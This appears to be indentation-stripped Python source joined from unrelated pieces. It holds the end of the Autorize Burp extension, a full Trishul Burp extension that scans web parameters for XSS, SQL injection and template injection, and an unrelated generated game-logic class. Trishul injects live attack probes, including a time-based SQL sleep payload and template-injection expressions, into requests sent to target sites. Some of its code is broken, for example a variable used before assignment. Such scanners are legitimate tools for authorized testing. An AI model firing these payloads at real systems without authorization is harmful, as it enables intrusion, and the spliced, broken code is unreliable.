htmlContent = """<html><title>Autorize Report by Barak Tawily</title>
<style>
.datagrid table { border-collapse: collapse; text-align: left; width: 100%; }
.datagrid {font: normal 12px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #006699; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; }
.datagrid table td, .datagrid table th { padding: 3px 10px; }
.datagrid table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; color:#FFFFFF; font-size: 15px; font-weight: bold; border-left: 1px solid #0070A8; } .datagrid table thead th:first-child { border: none; }.datagrid table tbody td { color: #00496B; border-left: 1px solid #E1EEF4;font-size: 12px;font-weight: normal; }.datagrid table tbody .alt td { background: #E1EEF4; color: #00496B; }.datagrid table tbody td:first-child { border-left: none; }.datagrid table tbody tr:last-child td { border-bottom: none; }.datagrid table tfoot td div { border-top: 1px solid #006699;background: #E1EEF4;} .datagrid table tfoot td { padding: 0; font-size: 12px } .datagrid table tfoot td div{ padding: 2px; }.datagrid table tfoot td ul { margin: 0; padding:0; list-style: none; text-align: right; }.datagrid table tfoot li { display: inline; }.datagrid table tfoot li a { text-decoration: none; display: inline-block; padding: 2px 8px; margin: 1px;color: #FFFFFF;border: 1px solid #006699;-webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; }.datagrid table tfoot ul.active, .datagrid table tfoot ul a:hover { text-decoration: none;border-color: #006699; color: #FFFFFF; background: none; background-color:#00557F;}div.dhtmlx_window_active, div.dhx_modal_cover_dv { position: fixed !important; }
table {
width: 100%;
table-layout: fixed;
}
td {
border: 1px solid #35f;
overflow: hidden;
text-overflow: ellipsis;
}
td.a {
width: 13%;
white-space: nowrap;
}
td.b {
width: 9%;
word-wrap: break-word;
}
</style>
<body>
<h1>Autorize Report<h1>
<div class="datagrid"><table>
<thead><tr><th>URL</th><th>Authorization Enforcement Status</th></tr></thead>
<tbody>"""
for i in range(0, self._log.size()):
color = ""
if self._log.get(
i
)._enfocementStatus == "Authorization enforced??? (please configure enforcement detector)":
color = "yellow"
if self._log.get(i)._enfocementStatus == "Authorization bypass!":
color = "red"
if self._log.get(i)._enfocementStatus == "Authorization enforced!":
color = "LawnGreen"
if enforcementStatusFilter == "All Statuses":
htmlContent += "<tr bgcolor=\"%s\"><td><a href=\"%s\">%s</a></td><td>%s</td></tr>" % (
color, self._log.get(i)._url, self._log.get(i)._url,
self._log.get(i)._enfocementStatus)
else:
if enforcementStatusFilter == self._log.get(
i)._enfocementStatus:
htmlContent += "<tr bgcolor=\"%s\"><td><a href=\"%s\">%s</a></td><td>%s</td></tr>" % (
color, self._log.get(i)._url, self._log.get(i)._url,
self._log.get(i)._enfocementStatus)
htmlContent += "</tbody></table></div></body></html>"
f = open(fileToSave.getAbsolutePath(), 'w')
f.writelines(htmlContent)
f.close()
#
# implement IContextMenuFactory
#
def createMenuItems(self, invocation):
responses = invocation.getSelectedMessages()
if responses > 0:
ret = LinkedList()
requestMenuItem = JMenuItem("Send request to Autorize")
cookieMenuItem = JMenuItem("Send cookie to Autorize")
requestMenuItem.addActionListener(
handleMenuItems(self, responses[0], "request"))
cookieMenuItem.addActionListener(
handleMenuItems(self, responses[0], "cookie"))
ret.add(requestMenuItem)
ret.add(cookieMenuItem)
return (ret)
return null
#
# implement ITab
#
def getTabCaption(self):
return "Autorize"
def getUiComponent(self):
return self._splitpane
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 2
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "URL"
if columnIndex == 1:
return "Authorization Enforcement Status"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._url.toString()
if columnIndex == 1:
return logEntry._enfocementStatus
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
if self.intercept == 1:
if self.prevent304.isSelected():
if messageIsRequest:
requestHeaders = list(
self._helpers.analyzeRequest(messageInfo).getHeaders())
newHeaders = list()
found = 0
for header in requestHeaders:
if not "If-None-Match:" in header and not "If-Modified-Since:" in header:
newHeaders.append(header)
found = 1
if found == 1:
requestInfo = self._helpers.analyzeRequest(messageInfo)
bodyBytes = messageInfo.getRequest()[requestInfo.
getBodyOffset():]
bodyStr = self._helpers.bytesToString(bodyBytes)
messageInfo.setRequest(
self._helpers.buildHttpMessage(
newHeaders, bodyStr))
if not messageIsRequest:
if not self.replaceString.getText(
) in self._helpers.analyzeRequest(messageInfo).getHeaders():
if self.ignore304.isSelected():
firstHeader = self._helpers.analyzeResponse(
messageInfo.getResponse()).getHeaders()[0]
if "304" in firstHeader or "204" in firstHeader:
return
if self.IFList.getModel().getSize() == 0:
self.checkAuthorization(
messageInfo,
self._helpers.analyzeResponse(
messageInfo.getResponse()).getHeaders())
else:
urlString = str(
self._helpers.analyzeRequest(messageInfo).getUrl())
for i in range(0, self.IFList.getModel().getSize()):
if self.IFList.getModel().getElementAt(i).split(
":")[0] == "Scope items only":
currentURL = URL(urlString)
if self._callbacks.isInScope(currentURL):
self.checkAuthorization(
messageInfo,
self._helpers.analyzeResponse(
messageInfo.getResponse()).
getHeaders())
if self.IFList.getModel().getElementAt(i).split(
":")[0] == "URL Contains":
if self.IFList.getModel().getElementAt(
i)[14:] in urlString:
self.checkAuthorization(
messageInfo,
self._helpers.analyzeResponse(
messageInfo.getResponse()).
getHeaders())
return
def makeRequest(self, messageInfo, message):
requestURL = self._helpers.analyzeRequest(messageInfo).getUrl()
return self._callbacks.makeHttpRequest(
self._helpers.buildHttpService(
str(requestURL.getHost()), int(requestURL.getPort()),
requestURL.getProtocol() == "https"), message)
def makeMessage(self, messageInfo, removeOrNot):
requestInfo = self._helpers.analyzeRequest(messageInfo)
headers = requestInfo.getHeaders()
if removeOrNot:
headers = list(headers)
removeHeaders = ArrayList()
removeHeaders.add(self.replaceString.getText()
[0:self.replaceString.getText().index(":")])
for header in headers[:]:
for removeHeader in removeHeaders:
if removeHeader in header:
headers.remove(header)
headers.append(self.replaceString.getText())
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
return self._helpers.buildHttpMessage(headers, msgBody)
def checkAuthorization(self, messageInfo, originalHeaders):
message = self.makeMessage(messageInfo, True)
requestResponse = self.makeRequest(messageInfo, message)
analyzedResponse = self._helpers.analyzeResponse(
requestResponse.getResponse())
oldStatusCode = originalHeaders[0]
newStatusCode = analyzedResponse.getHeaders()[0]
oldContentLen = self.getContentLength(originalHeaders)
newContentLen = self.getContentLength(analyzedResponse.getHeaders())
impression = ""
EDFilters = self.EDModel.toArray()
if oldStatusCode == newStatusCode:
if oldContentLen == newContentLen:
impression = "Authorization bypass!"
else:
impression = "Authorization enforced??? (please configure enforcement detector)"
for filter in EDFilters:
if str(filter).startswith("Content-Length: "):
if newContentLen == filter:
impression = "Authorization enforced!"
if str(filter).startswith("Finger Print: "):
if filter[14:] in self._helpers.bytesToString(
requestResponse.getResponse()
[analyzedResponse.getBodyOffset():]):
impression = "Authorization enforced!"
else:
impression = "Authorization enforced!"
self._lock.acquire()
row = self._log.size()
self._log.add(
LogEntry(self._callbacks.saveBuffersToTempFiles(requestResponse),
self._helpers.analyzeRequest(requestResponse).getUrl(),
messageInfo,
impression)) # same requests not include again.
self.fireTableRowsInserted(row, row)
self._lock.release()
def getContentLength(self, analyzedResponseHeaders):
for header in analyzedResponseHeaders:
if "Content-Length:" in header:
return header
return "null"
def getCookieFromMessage(self, messageInfo):
headers = list(
self._helpers.analyzeRequest(
messageInfo.getRequest()).getHeaders())
for header in headers:
if "Cookie:" in header:
return header
return None
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel, IContextMenuFactory, IHttpRequestResponseWithMarkers, ITextEditor):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
#Initialize callbacks to be used later
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName("Trishul")
self._log = ArrayList()
#_log used to store our outputs for a URL, which is retrieved later by the tool
self._lock = Lock()
#Lock is used for locking threads while updating logs in order such that no multiple updates happen at once
self.intercept = 0
self.FOUND = "Found"
self.CHECK = "Possible! Check Manually"
self.NOT_FOUND = "Not Found"
#Static Values for output
#Initialize GUI
self.issuesTab()
self.advisoryReqResp()
self.configTab()
self.tabsInit()
self.definecallbacks()
print("Thank You for Installing Trishul")
return
#
#Initialize Issues Tab displaying the JTree
#
def issuesTab(self):
self.root = DefaultMutableTreeNode('Issues')
frame = JFrame("Issues Tree")
self.tree = JTree(self.root)
self.rowSelected = ''
self.tree.addMouseListener(mouseclick(self))
self.issuepanel = JScrollPane()
self.issuepanel.setPreferredSize(Dimension(300,450))
self.issuepanel.getViewport().setView((self.tree))
frame.add(self.issuepanel,BorderLayout.CENTER)
#
#Adding Issues to Issues TreePath
#
def addIssues(self, branch, branchData=None):
if branchData == None:
branch.add(DefaultMutableTreeNode('No valid data'))
else:
for item in branchData:
branch.add(DefaultMutableTreeNode(item))
#
#Initialize the Config Tab to modify tool settings
#
def configTab(self):
Config = JLabel("Config")
self.startButton = JToggleButton("Intercept Off", actionPerformed=self.startOrStop)
self.startButton.setBounds(40, 30, 200, 30)
self.autoScroll = JCheckBox("Auto Scroll")
self.autoScroll.setBounds(40, 80, 200, 30)
self.xsscheck = JCheckBox("Detect XSS")
self.xsscheck.setSelected(True)
self.xsscheck.setBounds(40, 110, 200, 30)
self.sqlicheck = JCheckBox("Detect SQLi")
self.sqlicheck.setSelected(True)
self.sqlicheck.setBounds(40, 140, 200, 30)
self.ssticheck = JCheckBox("Detect SSTI")
self.ssticheck.setSelected(True)
self.ssticheck.setBounds(40, 170, 200, 30)
self.blindxss = JCheckBox("Blind XSS")
self.blindxss.setBounds(40, 200, 200, 30)
self.BlindXSSText = JTextArea("", 5, 30)
scrollbxssText = JScrollPane(self.BlindXSSText)
scrollbxssText.setVerticalScrollBarPolicy(JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
scrollbxssText.setBounds(40, 250, 400, 110)
self.configtab = JPanel()
self.configtab.setLayout(None)
self.configtab.setBounds(0, 0, 300, 300)
self.configtab.add(Config)
self.configtab.add(self.startButton)
self.configtab.add(self.autoScroll)
self.configtab.add(self.xsscheck)
self.configtab.add(self.sqlicheck)
self.configtab.add(self.ssticheck)
self.configtab.add(self.blindxss)
self.configtab.add(scrollbxssText)
#
#Turn Intercept from Proxy on or off
#
def startOrStop(self, event):
if self.startButton.getText() == "Intercept Off":
self.startButton.setText("Intercept On")
self.startButton.setSelected(True)
self.intercept = 1
else:
self.startButton.setText("Intercept Off")
self.startButton.setSelected(False)
self.intercept = 0
#
#Intialize the Advisory, Request and Response Tabs
#
def advisoryReqResp(self):
self.textfield = JEditorPane("text/html", "")
self.kit = HTMLEditorKit()
self.textfield.setEditorKit(self.kit)
self.doc = self.textfield.getDocument()
self.textfield.setEditable(0)
self.advisorypanel = JScrollPane()
self.advisorypanel.getVerticalScrollBar()
self.advisorypanel.setPreferredSize(Dimension(300,450))
self.advisorypanel.getViewport().setView((self.textfield))
self.selectedreq = []
self._requestViewer = self._callbacks.createMessageEditor(self, False)
self._responseViewer = self._callbacks.createMessageEditor(self, False)
self._texteditor = self._callbacks.createTextEditor()
self._texteditor.setEditable(False)
#
#Initialize Trishul Tabs
#
def tabsInit(self):
self.logTable = Table(self)
tableWidth = self.logTable.getPreferredSize().width
self.logTable.getColumn("#").setPreferredWidth(Math.round(tableWidth / 50 * 0.1))
self.logTable.getColumn("Method").setPreferredWidth(Math.round(tableWidth / 50 * 3))
self.logTable.getColumn("URL").setPreferredWidth(Math.round(tableWidth / 50 * 40))
self.logTable.getColumn("Parameters").setPreferredWidth(Math.round(tableWidth / 50 * 1))
self.logTable.getColumn("XSS").setPreferredWidth(Math.round(tableWidth / 50 * 4))
self.logTable.getColumn("SQLi").setPreferredWidth(Math.round(tableWidth / 50 * 4))
self.logTable.getColumn("SSTI").setPreferredWidth(Math.round(tableWidth / 50 * 4))
self.logTable.getColumn("Request Time").setPreferredWidth(Math.round(tableWidth / 50 * 4))
self.tableSorter = TableRowSorter(self)
self.logTable.setRowSorter(self.tableSorter)
self._bottomsplit = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
self._bottomsplit.setDividerLocation(500)
self.issuetab = JTabbedPane()
self.issuetab.addTab("Config",self.configtab)
self.issuetab.addTab("Issues",self.issuepanel)
self._bottomsplit.setLeftComponent(self.issuetab)
self.tabs = JTabbedPane()
self.tabs.addTab("Advisory",self.advisorypanel)
self.tabs.addTab("Request", self._requestViewer.getComponent())
self.tabs.addTab("Response", self._responseViewer.getComponent())
self.tabs.addTab("Highlighted Response", self._texteditor.getComponent())
self._bottomsplit.setRightComponent(self.tabs)
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
self._splitpane.setDividerLocation(450)
self._splitpane.setResizeWeight(1)
self.scrollPane = JScrollPane(self.logTable)
self._splitpane.setLeftComponent(self.scrollPane)
self.scrollPane.getVerticalScrollBar().addAdjustmentListener(autoScrollListener(self))
self._splitpane.setRightComponent(self._bottomsplit)
#
#Initialize burp callbacks
#
def definecallbacks(self):
self._callbacks.registerHttpListener(self)
self._callbacks.customizeUiComponent(self._splitpane)
self._callbacks.customizeUiComponent(self.logTable)
self._callbacks.customizeUiComponent(self.scrollPane)
self._callbacks.customizeUiComponent(self._bottomsplit)
self._callbacks.registerContextMenuFactory(self)
self._callbacks.addSuiteTab(self)
#
#Menu Item to send Request to Trishul
#
def createMenuItems(self, invocation):
responses = invocation.getSelectedMessages()
if responses > 0:
ret = LinkedList()
requestMenuItem = JMenuItem("Send request to Trishul")
for response in responses:
requestMenuItem.addActionListener(handleMenuItems(self,response, "request"))
ret.add(requestMenuItem)
return ret
return None
#
#Highlighting Response
#
def markHttpMessage( self, requestResponse, responseMarkString ):
responseMarkers = None
if responseMarkString:
response = requestResponse.getResponse()
responseMarkBytes = self._helpers.stringToBytes( responseMarkString )
start = self._helpers.indexOf( response, responseMarkBytes, False, 0, len( response ) )
if -1 < start:
responseMarkers = [ array( 'i',[ start, start + len( responseMarkBytes ) ] ) ]
requestHighlights = [array( 'i',[ 0, 5 ] )]
return self._callbacks.applyMarkers( requestResponse, requestHighlights, responseMarkers )
def getTabCaption(self):
return "Trishul"
def getUiComponent(self):
return self._splitpane
#
#Table Model to display URL's and results based on the log size
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 8
def getColumnName(self, columnIndex):
data = ['#','Method', 'URL', 'Parameters', 'XSS', 'SQLi', "SSTI", "Request Time"]
try:
return data[columnIndex]
except IndexError:
return ""
def getColumnClass(self, columnIndex):
data = [Integer, String, String, Integer, String, String, String, String]
try:
return data[columnIndex]
except IndexError:
return ""
#Get Data stored in log and display in the respective columns
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return rowIndex+1
if columnIndex == 1:
return logEntry._method
if columnIndex == 2:
return logEntry._url.toString()
if columnIndex == 3:
return len(logEntry._parameter)
if columnIndex == 4:
return logEntry._XSSStatus
if columnIndex == 5:
return logEntry._SQLiStatus
if columnIndex == 6:
return logEntry._SSTIStatus
if columnIndex == 7:
return logEntry._req_time
return ""
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
#For Intercepted requests perform tests in scope
def processHttpMessage(self, toolFlag, messageIsRequest, messageInf):
if self.intercept == 1:
if toolFlag == self._callbacks.TOOL_PROXY:
if not messageIsRequest:
requestInfo = self._helpers.analyzeRequest(messageInf)
requeststr = requestInfo.getUrl()
parameters = requestInfo.getParameters()
param_new = [p for p in parameters if p.getType() != 2]
if len(param_new) != 0:
if self._callbacks.isInScope(URL(str(requeststr))):
start_new_thread(self.sendRequestToTrishul,(messageInf,))
return
#
#Main processing of Trishul
#
def sendRequestToTrishul(self,messageInfo):
request = messageInfo.getRequest()
req_time = datetime.datetime.today()
requestURL = self._helpers.analyzeRequest(messageInfo).getUrl()
messageInfo = self._callbacks.makeHttpRequest(self._helpers.buildHttpService(str(requestURL.getHost()), int(requestURL.getPort()), requestURL.getProtocol() == "https"), request)
resp_time = datetime.datetime.today()
time_taken = (resp_time - req_time).total_seconds()
response = messageInfo.getResponse()
#initialozations of default value
SQLiimp = self.NOT_FOUND
SSTIimp = self.NOT_FOUND
XSSimp = self.NOT_FOUND
Comp_req = messageInfo
requestInfo = self._helpers.analyzeRequest(messageInfo)
self.content_resp = self._helpers.analyzeResponse(response)
requestURL = requestInfo.getUrl()
parameters = requestInfo.getParameters()
requeststring = self._helpers.bytesToString(request)
headers = requestInfo.getHeaders()
#Used to obtain GET, POST and JSON parameters from burp api
param_new = [p for p in parameters if p.getType() == 0 or p.getType() == 1 or p.getType() == 6]
i = 0
xssflag=0
sqliflag=0
sstiflag=0
resultxss = []
resultsqli = []
resultssti = []
xssreqresp = []
sqlireqresp = []
sstireqresp = []
ssti_description = []
sqli_description = []
xss_description = []
for i in range(len(param_new)):
name = param_new[i].getName()
ptype = param_new[i].getType()
param_value = param_new[i].getValue()
#check XSS if ticked
if self.xsscheck.isSelected():
score = 0
flag1 = 0
XSSimp = self.NOT_FOUND
payload_array = ["<", ">", "\\\\'asd", "\\\\\"asd", "\\", "'\""]
json_payload_array = ["<", ">", "\\\\'asd", "\\\"asd", "\\", "\'\\\""]
payload_all = ""
json_payload = ""
rand_str = "testtest"
for payload in payload_array:
payload_all = payload_all+rand_str+payload
payload_all = URLEncoder.encode(payload_all, "UTF-8")
for payload in json_payload_array:
json_payload = json_payload+rand_str+payload
json_payload = URLEncoder.encode(json_payload, "UTF-8")
if ptype == 0 or ptype == 1:
new_paramters_value = self._helpers.buildParameter(name, payload_all, ptype)
updated_request = self._helpers.updateParameter(request, new_paramters_value)
else:
jsonreq = re.search(r"\s([{\[].*?[}\]])$", requeststring).group(1)
new = jsonreq.split(name+"\":",1)[1]
if new.startswith('\"'):
newjsonreq = jsonreq.replace(name+"\":\""+param_value,name+"\":\""+json_payload)
else:
newjsonreq = jsonreq.replace(name+"\":"+param_value,name+"\":\""+json_payload+"\"")
updated_request = self._helpers.buildHttpMessage(headers, newjsonreq)
attack = self.makeRequest(Comp_req, updated_request)
response = attack.getResponse()
response_str = self._helpers.bytesToString(response)
xssreqresp.append(attack)
if_found_payload = ""
non_encoded_symbols = ""
for check_payload in payload_array:
if_found_payload = rand_str+check_payload
if if_found_payload in response_str:
non_encoded_symbols = non_encoded_symbols+"<br>"+check_payload.replace('<', '<')
score = score+1
flag1 = 1
if score > 2: XSSimp = self.CHECK
if score > 3: XSSimp = self.FOUND
xssflag = self.checkBetterScore(score,xssflag)
if non_encoded_symbols == " \\\\'asd":
XSSimp = self.NOT_FOUND
if non_encoded_symbols != '':
xss_description.append("The Payload <b>" + payload_all.replace('<', '<') + "</b> was passed in the request for the paramater <b>" + self._helpers.urlDecode(name) + "</b>. Some Tags were observed in the output unfiltered. A payload can be generated with the observed tags.<br>Symbols not encoded for parameter <b>" + name + "</b>: " + non_encoded_symbols)
else:
xss_description.append("")
else:
XSSimp = "Disabled"
resultxss.append(XSSimp)
if self.sqlicheck.isSelected():
SQLiimp = self.NOT_FOUND
score = 0
value = "%27and%28select%2afrom%28select%28sleep%285%29%29%29a%29--"
orig_time = datetime.datetime.today()
if ptype == 0 or ptype == 1:
new_paramters_value = self._helpers.buildParameter(name, value, ptype)
updated_request = self._helpers.updateParameter(request, new_paramters_value)
else:
jsonreq = re.search(r"\s([{\[].*?[}\]])$", requeststring).group(1)
new = jsonreq.split(name+"\":",1)[1]
if new.startswith('\"'):
newjsonreq = jsonreq.replace(name+"\":\""+param_value,name+"\":\""+value)
else:
newjsonreq = jsonreq.replace(name+"\":"+param_value,name+"\":\""+value+"\"")
updated_request = self._helpers.buildHttpMessage(headers, newjsonreq)
attack1 = self.makeRequest(Comp_req, updated_request)
response1 = attack1.getResponse()
new_time = datetime.datetime.today()
response_str1 = self._helpers.bytesToString(response1)
sqlireqresp.append(attack1)
diff = (new_time - orig_time).total_seconds()
if (diff - time_taken) > 3:
score = 4
self.error_array = ["check the manual that corresponds to your", "You have an error", "syntax error", "SQL syntax", "SQL statement", "ERROR:", "Error:", "MySQL","Warning:","mysql_fetch_array()"]
found_text = ""
for error in self.error_array:
if error in response_str1:
found_text = found_text + error
score = score + 1
if score > 1: SQLiimp = self.CHECK
if score > 2: SQLiimp = self.FOUND
sqliflag = self.checkBetterScore(score,sqliflag)
if found_text != '':
sqli_description.append("The payload <b>"+self._helpers.urlDecode(value)+"</b> was passed in the request for parameter <b>"+self._helpers.urlDecode(name)+"</b>. Some errors were generated in the response which confirms that there is an Error based SQLi. Please check the request and response for this parameter")
elif (diff - time_taken) > 3:
sqli_description.append("The payload <b>"+self._helpers.urlDecode(value)+"</b> was passed in the request for parameter <b>"+self._helpers.urlDecode(name)+"</b>. The response was in a delay of <b>"+str(diff)+"</b> seconds as compared to original <b>"+str(time_taken)+"</b> seconds. This indicates that there is a time based SQLi. Please check the request and response for this parameter")
else:
sqli_description.append("")
else:
SQLiimp = "Disabled"
resultsqli.append(SQLiimp)
if self.ssticheck.isSelected():
score = 0
SSTIimp = self.NOT_FOUND
payload_array = ["${123*456}", "<%=123*567%>", "{{123*678}}"]
json_payload_array = ["$\{123*456\}", "<%=123*567%>", "\{\{123*678\}\}"]
payload_all = ""
rand_str = "jjjjjjj"
json_payload = ""
for payload in payload_array:
payload_all = payload_all+rand_str+payload
for payload in json_payload_array:
json_payload = json_payload+rand_str+payload
payload_all = URLEncoder.encode(payload_all, "UTF-8")
json_payload = URLEncoder.encode(json_payload, "UTF-8")
if ptype == 0 or ptype == 1:
new_paramters_value = self._helpers.buildParameter(name, payload_all, ptype)
updated_request = self._helpers.updateParameter(request, new_paramters_value)
else:
jsonreq = re.search(r"\s([{\[].*?[}\]])$", requeststring).group(1)
new = jsonreq.split(name+"\":",1)[1]
if new.startswith('\"'):
newjsonreq = jsonreq.replace(name+"\":\""+param_value,name+"\":\""+json_payload)
else:
newjsonreq = jsonreq.replace(name+"\":"+param_value,name+"\":\""+json_payload+"\"")
updated_request = self._helpers.buildHttpMessage(headers, newjsonreq)
attack = self.makeRequest(Comp_req, updated_request)
response = attack.getResponse()
response_str = self._helpers.bytesToString(response)
self.expected_output = ["56088","69741","83394","3885","777777777777777"]
for output in self.expected_output:
if_found_payload = rand_str+output
if if_found_payload in response_str:
if output == self.expected_output[0]:
sstireqresp.append(attack)
ssti_description.append("Parameter <b>" + self._helpers.urlDecode(name) + "</b> is using <b>Java</b> Template<br>The value <b>" + payload_new + "</b> was passed which gave result as <b>56088</b>")
score = 2
if output == self.expected_output[1]:
sstireqresp.append(attack)
ssti_description.append("Parameter <b>" + self._helpers.urlDecode(name) + "</b> is using <b>Ruby</b> Template<br>The value <b>" + payload_new + "</b> was passed which gave result as <b>69741</b>")
score = 2
if output == self.expected_output[2]:
payload_new = "{{5*'777'}}"
json_payload_ssti = "\{\{5*'777'\}\}"
payload = URLEncoder.encode("{{5*'777'}}", "UTF-8")
json_ssti = URLEncoder.encode("\{\{5*'777'\}\}", "UTF-8")
if ptype == 0 or ptype == 1:
new_paramters = self._helpers.buildParameter(name, payload, ptype)
ssti_updated_request = self._helpers.updateParameter(request, new_paramters)
else:
jsonreq = re.search(r"\s([{\[].*?[}\]])$", requeststring).group(1)
new = jsonreq.split(name+"\":",1)[1]
if new.startswith('\"'):
newjsonreq = jsonreq.replace(name+"\":\""+param_value,name+"\":\""+json_ssti)
else:
newjsonreq = jsonreq.replace(name+"\":"+param_value,name+"\":\""+json_ssti+"\"")
ssti_updated_request = self._helpers.buildHttpMessage(headers, newjsonreq)
self.ssti_attack = self.makeRequest(Comp_req, ssti_updated_request)
ssti_response = self.ssti_attack.getResponse()
ssti_response_str = self._helpers.bytesToString(ssti_response)
if self.expected_output[3] in ssti_response_str:
sstireqresp.append(self.ssti_attack)
ssti_description.append("Parameter <b>" + self._helpers.urlDecode(name) + "</b> is using <b>Twig</b> Template<br>The value <b>" + payload_new + "</b> was passed which gave result as <b>3885</b>")
score = 2
elif self.expected_output[4] in ssti_response_str:
sstireqresp.append(self.ssti_attack)
self.responseMarkString = "777777777777777"
ssti_description.append("Parameter <b>" + self._helpers.urlDecode(name) + "</b> is using <b>Jinja2</b> Template<br>The value <b>" + payload_new + "</b> was passed which gave result as <b>777777777777777</b>")
score = 2
if score > 0: SSTIimp = self.CHECK
if score > 1: SSTIimp = self.FOUND
sstiflag = self.checkBetterScore(score,sstiflag)
else:
SSTIimp = "Disabled"
resultssti.append(SSTIimp)
if self.blindxss.isSelected():
blindxss_value = self.BlindXSSText.getText()
if ptype == 0 or ptype == 1:
new_paramters_value = self._helpers.buildParameter(name, blindxss_value, ptype)
updated_request = self._helpers.updateParameter(request, new_paramters_value)
else:
jsonreq = re.search(r"\s([{\[].*?[}\]])$", requeststring).group(1)
new = jsonreq.split(name+"\":",1)[1]
if new.startswith('\"'):
newjsonreq = jsonreq.replace(name+"\":\""+param_value,name+"\":\""+blindxss_value)
else:
newjsonreq = jsonreq.replace(name+"\":"+param_value,name+"\":\""+blindxss_value+"\"")
updated_request = self._helpers.buildHttpMessage(headers, newjsonreq)
attack = self.makeRequest(Comp_req, updated_request)
if XSSimp != "Disabled":
if xssflag > 3: XSSimp = self.FOUND
elif xssflag > 2: XSSimp = self.CHECK
else: XSSimp = self.NOT_FOUND
if SSTIimp != "Disabled":
if sstiflag > 1: SSTIimp = self.FOUND
elif sstiflag > 0: SSTIimp = self.CHECK
else: SSTIimp = self.NOT_FOUND
if SQLiimp != "Disabled":
if sqliflag > 3: SQLiimp = self.FOUND
elif sqliflag > 2: SQLiimp = self.CHECK
else: SQLiimp = self.NOT_FOUND
self.addToLog(messageInfo, XSSimp, SQLiimp, SSTIimp, param_new, resultxss, resultsqli, resultssti, xssreqresp, sqlireqresp, sstireqresp , xss_description, sqli_description, ssti_description, req_time.strftime('%H:%M:%S %m/%d/%y'))
#
#Function used to check if the score originally and mentioned is better
#
def checkBetterScore(self, score, ogscore):
if score > ogscore:
ogscore = score
return ogscore
def makeRequest(self, messageInfo, message):
request = messageInfo.getRequest()
requestURL = self._helpers.analyzeRequest(messageInfo).getUrl()
return self._callbacks.makeHttpRequest(self._helpers.buildHttpService(str(requestURL.getHost()), int(requestURL.getPort()), requestURL.getProtocol() == "https"), message)
def addToLog(self, messageInfo, XSSimp, SQLiimp, SSTIimp, parameters, resultxss, resultsqli, resultssti, xssreqresp, sqlireqresp, sstireqresp, xss_description, sqli_description, ssti_description, req_time):
requestInfo = self._helpers.analyzeRequest(messageInfo)
method = requestInfo.getMethod()
self._lock.acquire()
row = self._log.size()
self._log.add(LogEntry(self._callbacks.saveBuffersToTempFiles(messageInfo), requestInfo.getUrl(),method,XSSimp,SQLiimp,SSTIimp,req_time, parameters,resultxss, resultsqli, resultssti, xssreqresp, sqlireqresp, sstireqresp, xss_description, sqli_description, ssti_description)) # same requests not include again.
SwingUtilities.invokeLater(UpdateTableEDT(self,"insert",row,row))
self._lock.release()
class AssignmentsImpl(Assignments):
""" generated source for class AssignmentsImpl """
empty = bool()
allDone = False
# Contains all the assignments of variables we could make
headAssignment = Map()
varsToAssign = List()
valuesToIterate = List()
valuesToCompute = List()
indicesToChangeWhenNull = List()
# See note below
distincts = List()
varsToChangePerDistinct = List()
# indexing same as distincts
#
# * What does indicesToChangeWhenNull do? Well, sometimes after incrementing
# * part of the iterator, we find that a function being used to define a slot
# * in the tuple has no value corresponding to its inputs (the inputs are
# * outside the function's domain). In that case, we set the value to null,
# * then leave it to the makeNextAssignmentValid() method to deal with it.
# * We want to increment something in the input, but we need to know what
# * in the input we should increment (i.e. which is the rightmost slot in
# * the function's input). This is recorded in indicesToChangeWhenNull. If
# * a slot is not defined by a function, then presumably it will not be null,
# * so its value here is unimportant. Setting its value to -1 would help
# * catch errors.
#
tuplesBySource = List()
# indexed by conjunct
sourceDefiningSlot = List()
# indexed by var slot
varsChosenBySource = List()
# indexed by conjunct, then slot
putDontCheckBySource = List()
# indexed by conjunct, then slot
#
# * Creates an Assignments object that generates AssignmentIterators.
# * These can be used to efficiently iterate over all possible assignments
# * for variables in a given rule.
# *
# * @param headAssignment An assignment of variables whose values should be
# * fixed. May be empty.
# * @param rule The rule whose assignments we want to iterate over.
# * @param varDomains A map containing the possible values for each variable
# * in the rule. (All such values are GdlConstants.)
# * @param functionInfoMap
# * @param completedSentenceFormValues
#
@overloaded
def __init__(self, headAssignment, rule, varDomains, functionInfoMap, completedSentenceFormValues):
""" generated source for method __init__ """
super(AssignmentsImpl, self).__init__()
self.empty = False
self.headAssignment = headAssignment
# We first have to find the remaining variables in the body
self.varsToAssign = GdlUtils.getVariables(rule)
# Remove all the duplicates; we do, however, want to keep the ordering
newVarsToAssign = ArrayList()
